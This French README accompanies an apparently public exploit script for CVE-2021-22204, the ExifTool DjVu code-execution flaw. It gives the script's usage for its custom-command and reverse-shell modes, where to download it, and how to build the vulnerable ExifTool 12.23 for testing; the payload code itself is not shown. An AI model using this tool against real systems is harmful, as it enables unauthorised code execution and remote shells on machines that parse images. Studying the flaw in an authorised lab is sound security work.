
Exploit pour CVE-2021-22204 (ExifTool) - Exécution de code arbitraire

Vous aimez ce dépôt ? Donnez-nous une ⭐ !
À des fins éducatives et de recherche en sécurité autorisées uniquement.
@UNICORDev par (@NicPWNs et @Dev-Yeoj)
La neutralisation incorrecte des données utilisateur dans le format de fichier DjVu dans ExifTool versions 7.44 et ultérieures permet l'exécution de code arbitraire lors de l'analyse de l'image malveillante.
Utilisez cet exploit pour générer une charge utile d'image JPEG pouvant être utilisée avec une version vulnérable d'ExifTool pour l'exécution de code. Une commande personnalisée peut être fournie ou un shell inversé peut être généré. Une image JPEG est automatiquement générée et, facultativement, une image JPEG personnalisée peut être fournie pour y insérer la charge utile.
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
Télécharger exploit-CVE-2021-22204.py depuis GitHub
Télécharger exploit-CVE-2021-22204.py depuis ExploitDB
searchsploit -u
searchsploit -m 50911

Exiftool Version 12.23
Exiftool Versions 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg